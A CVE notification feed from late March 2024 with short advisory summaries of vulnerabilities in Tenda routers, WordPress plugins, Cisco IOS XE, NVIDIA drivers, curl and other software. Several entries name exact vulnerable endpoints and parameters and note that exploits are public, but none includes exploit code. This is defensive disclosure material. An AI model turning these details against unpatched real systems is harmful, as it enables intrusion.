🚨 CVE-2024-3011A vulnerability was found in Tenda FH1205 2.0.0.7(775). It has been classified as critical. This affects the function formQuickIndex of the file /goform/QuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258297 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-28 00:37:35 |
🚨 CVE-2024-0980The Auto-update service for Okta Verify for Windows is vulnerable to two flaws which in combination could be used to execute arbitrary code.🎖@cveNotify |
|
| 2024-03-27 23:37:26 |
🚨 CVE-2024-3008A vulnerability, which was classified as critical, was found in Tenda FH1205 2.0.0.7(775). Affected is the function formexeCommand of the file /goform/execCommand. The manipulation of the argument cmdinput leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-258294 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-27 23:37:25 |
🚨 CVE-2024-3006A vulnerability classified as critical was found in Tenda FH1205 2.0.0.7(775). This vulnerability affects the function fromSetRouteStatic of the file /goform/fromRouteStatic. The manipulation of the argument entrys leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258292. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-27 23:37:24 |
🚨 CVE-2024-3004A vulnerability was found in code-projects Online Book System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /Product.php. The manipulation of the argument value leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-258206 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-27 22:37:36 |
🚨 CVE-2024-3003A vulnerability has been found in code-projects Online Book System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /cart.php. The manipulation of the argument quantity/remove leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258205 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-27 22:37:35 |
🚨 CVE-2024-3001A vulnerability, which was classified as critical, has been found in code-projects Online Book System 1.0. This issue affects some unknown processing of the file /Product.php. The manipulation of the argument value leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258203.🎖@cveNotify |
|
| 2024-03-27 22:37:31 |
🚨 CVE-2024-25354RegEx Denial of Service in domain-suffix 1.0.8 allows attackers to crash the application via crafted input to the parse function.🎖@cveNotify |
|
| 2024-03-27 22:37:30 |
🚨 CVE-2024-0077NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin, where it allows a guest OS to allocate resources for which the guest OS is not authorized. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.🎖@cveNotify |
|
| 2024-03-27 22:37:26 |
🚨 CVE-2024-0074NVIDIA GPU Display Driver for Linux contains a vulnerability where an attacker may access a memory location after the end of the buffer. A successful exploit of this vulnerability may lead to denial of service and data tampering.🎖@cveNotify |
|
| 2024-03-27 22:37:25 |
🚨 CVE-2024-0071NVIDIA GPU Display Driver for Windows contains a vulnerability in the user mode layer, where an unprivileged regular user can cause an out-of-bounds write. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.🎖@cveNotify |
|
| 2024-03-27 22:37:24 |
🚨 CVE-2023-47438SQL Injection vulnerability in Reportico Till 8.1.0 allows attackers to obtain sensitive information or other system information via the project parameter.🎖@cveNotify |
|
| 2024-03-27 21:37:25 |
🚨 CVE-2024-2997A vulnerability was found in Bdtask Multi-Store Inventory Management System up to 20240320. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument Category Name/Model Name/Brand Name/Unit Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258199. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-27 21:37:24 |
🚨 CVE-2023-50447Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).🎖@cveNotify |
|
| 2024-03-27 20:37:31 |
🚨 CVE-2024-2996A vulnerability was found in Bdtask Multi-Store Inventory Management System up to 20240320. It has been classified as problematic. Affected is an unknown function of the component Page Title Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-258198 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-27 20:37:27 |
🚨 CVE-2024-2993A vulnerability was found in Tenda FH1203 2.0.1.6. It has been classified as critical. Affected is the function formQuickIndex of the file /goform/QuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-258162 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-27 20:37:26 |
🚨 CVE-2024-29891ZITADEL users can upload their own avatar image and various image types are allowed. Due to a missing check, an attacker could upload HTML and pretend it is an image to gain access to the victim's account in certain scenarios. A possible victim would need to directly open the supposed image in the browser, where a session in ZITADEL needs to be active for this exploit to work. The exploit could only be reproduced if the victim was using Firefox. Chrome, Safari as well as Edge did not execute the code. This vulnerability is fixed in 2.48.3, 2.47.8, 2.46.5, 2.45.5, 2.44.7, 2.43.11, and 2.42.17.🎖@cveNotify |
|
| 2024-03-27 19:37:35 |
🚨 CVE-2024-2992A vulnerability was found in Tenda FH1203 2.0.1.6 and classified as critical. This issue affects the function formSetCfm of the file /goform/setcfm. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258161 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-27 19:37:32 |
🚨 CVE-2024-2991A vulnerability has been found in Tenda FH1203 2.0.1.6 and classified as critical. This vulnerability affects the function formWriteFacMac of the file /goform/WriteFacMac. The manipulation of the argument mac leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258160. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-27 19:37:31 |
🚨 CVE-2024-29888Saleor is an e-commerce platform that serves high-volume companies. When using `Pickup: Local stock only` click-and-collect as a delivery method in specific conditions the customer could overwrite the warehouse address with its own, which exposes its address as click-and-collect address. This issue has been patched in versions: `3.14.61`, `3.15.37`, `3.16.34`, `3.17.32`, `3.18.28`, `3.19.15`.🎖@cveNotify |
|
| 2024-03-27 19:37:30 |
🚨 CVE-2024-29886Serverpod is an app and web server, built for the Flutter and Dart ecosystem. An issue was identified with the old password hash algorithm that made it susceptible to rainbow attacks if the database was compromised. This vulnerability is fixed by 1.2.6.🎖@cveNotify |
|
| 2024-03-27 19:37:26 |
🚨 CVE-2024-28247The Pi-hole is a DNS sinkhole that protects your devices from unwanted content without installing any client-side software. A vulnerability has been discovered in Pihole that allows an authenticated user on the platform to read internal server files arbitrarily, and because the application runs from behind, reading files is done as a privileged user.If the URL that is in the list of "Adslists" begins with "file*" it is understood that it is updating from a local file, on the other hand if it does not begin with "file*" depending on the state of the response it does one thing or another. The problem resides in the update through local files. When updating from a file which contains non-domain lines, 5 of the non-domain lines are printed on the screen, so if you provide it with any file on the server which contains non-domain lines it will print them on the screen. This vulnerability is fixed by 5.18.🎖@cveNotify |
|
| 2024-03-27 19:37:25 |
🚨 CVE-2024-28085wall in util-linux through 2.40, often installed with setgid tty permissions, allows escape sequences to be sent to other users' terminals through argv. (Specifically, escape sequences received from stdin are blocked, but escape sequences received from argv are not blocked.) There may be plausible scenarios where this leads to account takeover.🎖@cveNotify |
|
| 2024-03-27 19:37:24 |
🚨 CVE-2024-29945In Splunk Enterprise versions below 9.2.1, 9.1.4, and 9.0.9, the software potentially exposes authentication tokens during the token validation process. This exposure happens when either Splunk Enterprise runs in debug mode or the JsonWebToken component has been configured to log its activity at the DEBUG logging level.🎖@cveNotify |
|
| 2024-03-27 18:37:32 |
🚨 CVE-2024-23451Incorrect Authorization issue exists in the API key based security model for Remote Cluster Security, which is currently in Beta, in Elasticsearch 8.10.0 and before 8.13.0. This allows a malicious user with a valid API key for a remote cluster configured to use the new Remote Cluster Security to read arbitrary documents from any index on the remote cluster, and only if they use the Elasticsearch custom transport protocol to issue requests with the target index ID, the shard ID and the document ID. None of Elasticsearch REST API endpoints are affected by this issue.🎖@cveNotify |
|
| 2024-03-27 18:37:28 |
🚨 CVE-2024-20307A vulnerability in the IKEv1 fragmentation code of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a heap overflow, resulting in an affected device reloading. This vulnerability exists because crafted, fragmented IKEv1 packets are not properly reassembled. An attacker could exploit this vulnerability by sending crafted UDP packets to an affected system. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. Note: Only traffic that is directed to the affected system can be used to exploit this vulnerability. This vulnerability can be triggered by IPv4 and IPv6 traffic.🎖@cveNotify |
|
| 2024-03-27 18:37:27 |
🚨 CVE-2023-5189A path traversal vulnerability exists in Ansible when extracting tarballs. An attacker could craft a malicious tarball so that when using the galaxy importer of Ansible Automation Hub, a symlink could be dropped on the disk, resulting in files being overwritten.🎖@cveNotify |
|
| 2024-03-27 18:07:32 |
🚨 CVE-2024-20265A vulnerability in the boot process of Cisco Access Point (AP) Software could allow an unauthenticated, physical attacker to bypass the Cisco Secure Boot functionality and load a software image that has been tampered with on an affected device. This vulnerability exists because unnecessary commands are available during boot time at the physical console. An attacker could exploit this vulnerability by interrupting the boot process and executing specific commands to bypass the Cisco Secure Boot validation checks and load an image that has been tampered with. This image would have been previously downloaded onto the targeted device. A successful exploit could allow the attacker to load the image once. The Cisco Secure Boot functionality is not permanently compromised.🎖@cveNotify |
|
| 2024-03-27 18:07:26 |
🚨 CVE-2024-20259A vulnerability in the DHCP snooping feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to a crafted IPv4 DHCP request packet being mishandled when endpoint analytics are enabled. An attacker could exploit this vulnerability by sending a crafted DHCP request through an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Note: The attack vector is listed as network because a DHCP relay anywhere on the network could allow exploits from networks other than the adjacent one.🎖@cveNotify |
|
| 2024-03-27 18:07:25 |
🚨 CVE-2024-1540Previously, it was possible to exfiltrate secrets in Gradio's CI, but this is now fixed.🎖@cveNotify |
|
| 2024-03-27 17:37:32 |
🚨 CVE-2024-20303A vulnerability in the multicast DNS (mDNS) gateway feature of Cisco IOS XE Software for Wireless LAN Controllers (WLCs) could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition. This vulnerability is due to improper management of mDNS client entries. An attacker could exploit this vulnerability by connecting to the wireless network and sending a continuous stream of specific mDNS packets. A successful exploit could allow the attacker to cause the wireless controller to have high CPU utilization, which could lead to access points (APs) losing their connection to the controller and result in a DoS condition.🎖@cveNotify |
|
| 2024-03-27 17:37:26 |
🚨 CVE-2024-20278A vulnerability in the NETCONF feature of Cisco IOS XE Software could allow an authenticated, remote attacker to elevate privileges to root on an affected device. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted input over NETCONF to an affected device. A successful exploit could allow the attacker to elevate privileges from Administrator to root.🎖@cveNotify |
|
| 2024-03-27 17:37:25 |
🚨 CVE-2024-20265A vulnerability in the boot process of Cisco Access Point (AP) Software could allow an unauthenticated, physical attacker to bypass the Cisco Secure Boot functionality and load a software image that has been tampered with on an affected device. This vulnerability exists because unnecessary commands are available during boot time at the physical console. An attacker could exploit this vulnerability by interrupting the boot process and executing specific commands to bypass the Cisco Secure Boot validation checks and load an image that has been tampered with. This image would have been previously downloaded onto the targeted device. A successful exploit could allow the attacker to load the image once. The Cisco Secure Boot functionality is not permanently compromised.🎖@cveNotify |
|
| 2024-03-27 17:37:24 |
🚨 CVE-2024-20259A vulnerability in the DHCP snooping feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to a crafted IPv4 DHCP request packet being mishandled when endpoint analytics are enabled. An attacker could exploit this vulnerability by sending a crafted DHCP request through an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Note: The attack vector is listed as network because a DHCP relay anywhere on the network could allow exploits from networks other than the adjacent one.🎖@cveNotify |
|
| 2024-03-27 16:37:26 |
🚨 CVE-2024-2984A vulnerability was found in Tenda FH1202 1.2.0.14(408). It has been classified as critical. This affects the function formSetCfm of the file /goform/setcfm. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258153 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-27 16:37:25 |
🚨 CVE-2024-1540Previously, it was possible to exfiltrate secrets in Gradio's CI, but this is now fixed.🎖@cveNotify |
|
| 2024-03-27 16:37:24 |
🚨 CVE-2021-3520There's a flaw in lz4. An attacker who submits a crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential impact to confidentiality and integrity as well.🎖@cveNotify |
|
| 2024-03-27 16:07:35 |
🚨 CVE-2020-8231Due to use of a dangling pointer, libcurl 7.29.0 through 7.71.1 can use the wrong connection when sending data.🎖@cveNotify |
|
| 2024-03-27 16:07:28 |
🚨 CVE-2020-14155libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring.🎖@cveNotify |
|
| 2024-03-27 16:07:27 |
🚨 CVE-2019-20454An out-of-bounds read was discovered in PCRE before 10.34 when the pattern \X is JIT compiled and used to match specially crafted subjects in non-UTF mode. Applications that use PCRE to parse untrusted input may be vulnerable to this flaw, which would allow an attacker to crash the application. The flaw occurs in do_extuni_no_utf in pcre2_jit_compile.c.🎖@cveNotify |
|
| 2024-03-27 15:37:32 |
🚨 CVE-2021-22926libcurl-using applications can ask for a specific client certificate to be used in a transfer. This is done with the `CURLOPT_SSLCERT` option (`--cert` with the command line tool).When libcurl is built to use the macOS native TLS library Secure Transport, an application can ask for the client certificate by name or with a file name - using the same option. If the name exists as a file, it will be used instead of by name.If the appliction runs with a current working directory that is writable by other users (like `/tmp`), a malicious user can create a file name with the same name as the app wants to use by name, and thereby trick the application to use the file based cert instead of the one referred to by name making libcurl send the wrong client certificate in the TLS connection handshake.🎖@cveNotify |
|
| 2024-03-27 15:37:26 |
🚨 CVE-2021-22925curl supports the `-t` command line option, known as `CURLOPT_TELNETOPTIONS`in libcurl. This rarely used option is used to send variable=content pairs toTELNET servers.Due to flaw in the option parser for sending `NEW_ENV` variables, libcurlcould be made to pass on uninitialized data from a stack based buffer to theserver. Therefore potentially revealing sensitive internal information to theserver using a clear-text network protocol.This could happen because curl did not call and use sscanf() correctly whenparsing the string provided by the application.🎖@cveNotify |
|
| 2024-03-27 15:37:25 |
🚨 CVE-2021-22922When curl is instructed to download content using the metalink feature, thecontents is verified against a hash provided in the metalink XML file.The metalink XML file points out to the client how to get the same contentfrom a set of different URLs, potentially hosted by different servers and theclient can then download the file from one or several of them. In a serial orparallel manner.If one of the servers hosting the contents has been breached and the contentsof the specific file on that server is replaced with a modified payload, curlshould detect this when the hash of the file mismatches after a completeddownload. It should remove the contents and instead try getting the contentsfrom another URL. This is not done, and instead such a hash mismatch is onlymentioned in text and the potentially malicious content is kept in the file ondisk.🎖@cveNotify |
|
| 2024-03-27 15:37:24 |
🚨 CVE-2021-22901curl 7.75.0 through 7.76.1 suffers from a use-after-free vulnerability resulting in already freed memory being used when a TLS 1.3 session ticket arrives over a connection. A malicious server can use this in rare unfortunate circumstances to potentially reach remote code execution in the client. When libcurl at run-time sets up support for TLS 1.3 session tickets on a connection using OpenSSL, it stores pointers to the transfer in-memory object for later retrieval when a session ticket arrives. If the connection is used by multiple transfers (like with a reused HTTP/1.1 connection or multiplexed HTTP/2 connection) that first transfer object might be freed before the new session is established on that connection and then the function will access a memory buffer that might be freed. When using that memory, libcurl might even call a function pointer in the object, making it possible for a remote code execution if the server could somehow manage to get crafted memory content into the correct place in memory.🎖@cveNotify |
|
| 2024-03-27 15:07:35 |
🚨 CVE-2021-30560Use after free in Blink XSLT in Google Chrome prior to 91.0.4472.164 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2024-03-27 12:37:26 |
🚨 CVE-2024-2894A vulnerability was found in Tenda AC7 15.03.06.44. It has been classified as critical. This affects the function formSetQosBand of the file /goform/SetNetControlList. The manipulation of the argument list leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257937 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-27 12:37:25 |
🚨 CVE-2024-29735Improper Preservation of Permissions vulnerability in Apache Airflow.This issue affects Apache Airflow from 2.8.2 through 2.8.3.Airflow's local file task handler in Airflow incorrectly set permissions for all parent folders of log folder, in default configuration adding write access to Unix group of the folders. In the case Airflow is run with the root user (not recommended) it added group write permission to all folders up to the root of the filesystem.If your log files are stored in the home directory, these permission changes might impact your ability to run SSH operations after your home directory becomes group-writeable.This issue does not affect users who use or extend Airflow using Official Airflow Docker reference images ( https://hub.docker.com/r/apache/airflow/ ) - those images require to have group write permission set anyway.You are affected only if you install Airflow using local installation / virtualenv or other Docker images, but the issue has no impact if docker containers are used as intended, i.e. where Airflow components do not share containers with other applications and users.Also you should not be affected if your umask is 002 (group write enabled) - this is the default on many linux systems.Recommendation for users using Airflow outside of the containers: * if you are using root to run Airflow, change your Airflow user to use non-root * upgrade Apache Airflow to 2.8.4 or above * If you prefer not to upgrade, you can change the https://airflow.apache.org/docs/apache-airflow/stable/configurations-ref.html#file-task-handler-new-folder-permissions to 0o755 (original value 0o775). * if you already ran Airflow tasks before and your default umask is 022 (group write disabled) you should stop Airflow components, check permissions of AIRFLOW_HOME/logs in all your components and all parent directories of this directory and remove group write access for all the parent directories🎖@cveNotify |
|
| 2024-03-27 11:37:33 |
🚨 CVE-2024-29936Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Blocksera Image Hover Effects – Elementor Addon allows Stored XSS.This issue affects Image Hover Effects – Elementor Addon: from n/a through 1.4.🎖@cveNotify |
|
| 2024-03-27 11:37:27 |
🚨 CVE-2024-29935Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SinaExtra Sina Extension for Elementor allows Stored XSS.This issue affects Sina Extension for Elementor: from n/a through 3.5.0.🎖@cveNotify |
|
| 2024-03-27 11:37:26 |
🚨 CVE-2024-29819Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Syam Mohan WPFront Notification Bar allows Stored XSS.This issue affects WPFront Notification Bar: from n/a through 3.3.2.🎖@cveNotify |
|
| 2024-03-27 11:37:25 |
🚨 CVE-2024-25962Dell InsightIQ, version 5.0, contains an improper access control vulnerability. A remote low privileged attacker could potentially exploit this vulnerability, leading to unauthorized access to monitoring data.🎖@cveNotify |
|
| 2024-03-27 10:37:27 |
🚨 CVE-2024-29932Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF) allows Stored XSS.This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n/a through 1.3.2.🎖@cveNotify |
|
| 2024-03-27 10:37:26 |
🚨 CVE-2024-29929Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WC Lovers WCFM – Frontend Manager for WooCommerce allows Stored XSS.This issue affects WCFM – Frontend Manager for WooCommerce: from n/a through 6.7.8.🎖@cveNotify |
|
| 2024-03-27 10:37:25 |
🚨 CVE-2023-43655Composer is a dependency manager for PHP. Users publishing a composer.phar to a public web-accessible server where the composer.phar can be executed as a php file may be subject to a remote code execution vulnerability if PHP also has `register_argc_argv` enabled in php.ini. Versions 2.6.4, 2.2.22 and 1.10.27 patch this vulnerability. Users are advised to upgrade. Users unable to upgrade should make sure `register_argc_argv` is disabled in php.ini, and avoid publishing composer.phar to the web as this is not best practice.🎖@cveNotify |
|
| 2024-03-27 09:37:24 |
🚨 CVE-2024-2962The Networker - Tech News WordPress Theme with Dark Mode theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the admin_reload_nav_menu() function in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to modify the location of display menus.🎖@cveNotify |
|
| 2024-03-27 08:37:45 |
🚨 CVE-2024-2956The Simple Ajax Chat – Add a Fast, Secure Chat Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 20231101 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-03-27 08:37:44 |
🚨 CVE-2024-2398When an application tells libcurl it wants to allow HTTP/2 server push, and the amount of received headers for the push surpasses the maximum allowed limit (1000), libcurl aborts the server push. When aborting, libcurl inadvertently does not free all the previously allocated headers and instead leaks the memory. Further, this error condition fails silently and is therefore not easily detected by an application.🎖@cveNotify |
|
| 2024-03-27 08:37:43 |
🚨 CVE-2024-2004When a protocol selection parameter option disables all protocols without adding any then the default set of protocols would remain in the allowed set due to an error in the logic for removing protocols. The below command would perform a request to curl.se with a plaintext protocol which has been explicitly disabled. curl --proto -all,-http http://curl.se The flaw is only present if the set of selected protocols disables the entire set of available protocols, in itself a command with no practical use and therefore unlikely to be encountered in real situations. The curl security team has thus assessed this to be low severity bug.🎖@cveNotify |
|
| 2024-03-27 08:37:39 |
🚨 CVE-2024-29927Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HasTheme WishSuite allows Stored XSS.This issue affects WishSuite: from n/a through 1.3.7.🎖@cveNotify |
|
| 2024-03-27 08:37:38 |
🚨 CVE-2024-29925Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpWax Post Grid, Slider & Carousel Ultimate allows Stored XSS.This issue affects Post Grid, Slider & Carousel Ultimate: from n/a through 1.6.6.🎖@cveNotify |
|
| 2024-03-27 08:37:37 |
🚨 CVE-2024-29924Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in W3 Eden, Inc. Premium Packages allows Reflected XSS.This issue affects Premium Packages: from n/a through 5.8.2.🎖@cveNotify |
|
| 2024-03-27 08:37:33 |
🚨 CVE-2024-29923Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PropertyHive allows Reflected XSS.This issue affects PropertyHive: from n/a through 2.0.8.🎖@cveNotify |
|
| 2024-03-27 08:37:32 |
🚨 CVE-2024-29921Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Supsystic Photo Gallery by Supsystic allows Stored XSS.This issue affects Photo Gallery by Supsystic: from n/a through 1.15.16.🎖@cveNotify |
|
| 2024-03-27 08:37:31 |
🚨 CVE-2024-29920Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Moveaddons Move Addons for Elementor allows Stored XSS.This issue affects Move Addons for Elementor: from n/a through 1.2.9.🎖@cveNotify |
|
| 2024-03-27 08:37:30 |
🚨 CVE-2024-29919Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Photo Gallery Team Photo Gallery by Ays allows Reflected XSS.This issue affects Photo Gallery by Ays: from n/a through 5.5.2.🎖@cveNotify |
|
| 2024-03-27 08:37:26 |
🚨 CVE-2024-29917Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Compact WP Audio Player allows Stored XSS.This issue affects Compact WP Audio Player: from n/a through 1.9.9.🎖@cveNotify |
|
| 2024-03-27 08:37:25 |
🚨 CVE-2023-35086It is identified a format string vulnerability in ASUS RT-AX56U V2 & RT-AC86U. This vulnerability is caused by directly using input as a format string when calling syslog in logmessage_normal function, in the do_detwan_cgi module of httpd. A remote attacker with administrator privilege can exploit this vulnerability to perform remote arbitrary code execution, arbitrary system operation or disrupt service.This issue affects RT-AX56U V2: 3.0.0.4.386_50460; RT-AC86U: 3.0.0.4_386_51529.🎖@cveNotify |
|
| 2024-03-27 07:37:32 |
🚨 CVE-2024-1521The Elementor Website Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an SVGZ file uploaded via the Form widget in all versions up to, and including, 3.20.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability is only exploitable on web servers running NGINX. It is not exploitable on web servers running Apache HTTP Server.🎖@cveNotify |
|
| 2024-03-27 07:37:26 |
🚨 CVE-2024-1364The Elementor Website Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via widget's custom_id in all versions up to, and including, 3.20.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-27 07:37:25 |
🚨 CVE-2023-39240It is identified a format string vulnerability in ASUS RT-AX56U V2’s iperf client function API. This vulnerability is caused by lacking validation for a specific value within its set_iperf3_cli.cgi module. A remote attacker with administrator privilege can exploit this vulnerability to perform remote arbitrary code execution, arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2024-03-27 07:37:24 |
🚨 CVE-2023-39238It is identified a format string vulnerability in ASUS RT-AX56U V2. This vulnerability is caused by lacking validation for a specific value within its set_iperf3_svr.cgi module. A remote attacker with administrator privilege can exploit this vulnerability to perform remote arbitrary code execution, arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2024-03-27 06:37:42 |
🚨 CVE-2024-25920Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP SMS allows Stored XSS.This issue affects WP SMS: from n/a through 6.3.4.🎖@cveNotify |
|
| 2024-03-27 06:37:41 |
🚨 CVE-2024-24800Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AdTribes.Io Product Feed PRO for WooCommerce allows Reflected XSS.This issue affects Product Feed PRO for WooCommerce: from n/a through 13.2.5.🎖@cveNotify |
|
| 2024-03-27 06:37:40 |
🚨 CVE-2024-24700Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Benjamin Rojas WP Editor allows Reflected XSS.This issue affects WP Editor: from n/a through 1.2.8.🎖@cveNotify |
|
| 2024-03-27 06:37:36 |
🚨 CVE-2024-22299Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Foliovision: Making the web work for you FV Flowplayer Video Player allows Reflected XSS.This issue affects FV Flowplayer Video Player: from n/a through 7.5.41.7212.🎖@cveNotify |
|
| 2024-03-27 06:37:35 |
🚨 CVE-2024-22149Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Oliver Seidel, Bastian Germann CformsII allows Stored XSS.This issue affects CformsII: from n/a through 15.0.5.🎖@cveNotify |
|
| 2024-03-27 06:37:31 |
🚨 CVE-2023-49815Unrestricted Upload of File with Dangerous Type vulnerability in WappPress Team WappPress.This issue affects WappPress: from n/a through 5.0.3.🎖@cveNotify |
|
| 2024-03-27 06:37:30 |
🚨 CVE-2023-46049LLVM 15.0.0 has a NULL pointer dereference in the parseOneMetadata() function via a crafted pdflatex.fmt file (or perhaps a crafted .o file) to llvm-lto. NOTE: this is disputed because the relationship between pdflatex.fmt and any LLVM language front end is not explained, and because a crash of the llvm-lto application should be categorized as a usability problem.🎖@cveNotify |
|
| 2024-03-27 06:37:26 |
🚨 CVE-2023-31854std::bad_alloc is mishandled in Precomp 0.4.8. NOTE: this is disputed because it should be categorized as a usability problem.🎖@cveNotify |
|
| 2024-03-27 06:37:25 |
🚨 CVE-2023-29134An issue was discovered in the Cargo extension for MediaWiki through 1.39.3. There is mishandling of backticks to smartSplit.🎖@cveNotify |
|
| 2024-03-27 06:37:24 |
🚨 CVE-2024-0565An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service.🎖@cveNotify |
|
| 2024-03-27 05:37:32 |
🚨 CVE-2023-46047An issue in Sane 1.2.1 allows a local attacker to execute arbitrary code via a crafted file to the sanei_configure_attach() function. NOTE: this is disputed because there is no expectation that the product should be starting with an attacker-controlled configuration file.🎖@cveNotify |
|
| 2024-03-27 05:37:31 |
🚨 CVE-2023-45935Qt 6 through 6.6 was discovered to contain a NULL pointer dereference via the function QXcbConnection::initializeAllAtoms(). NOTE: this is disputed because it is not expected that an X application should continue to run when there is arbitrary anomalous behavior from the X server.🎖@cveNotify |
|
| 2024-03-27 05:37:26 |
🚨 CVE-2023-45924libglxproto.c in OpenGL libglvnd bb06db5a was discovered to contain a segmentation violation via the function glXGetDrawableScreen(). NOTE: this is disputed because there are no common situations in which users require uninterrupted operation with an attacker-controller server.🎖@cveNotify |
|
| 2024-03-27 05:37:25 |
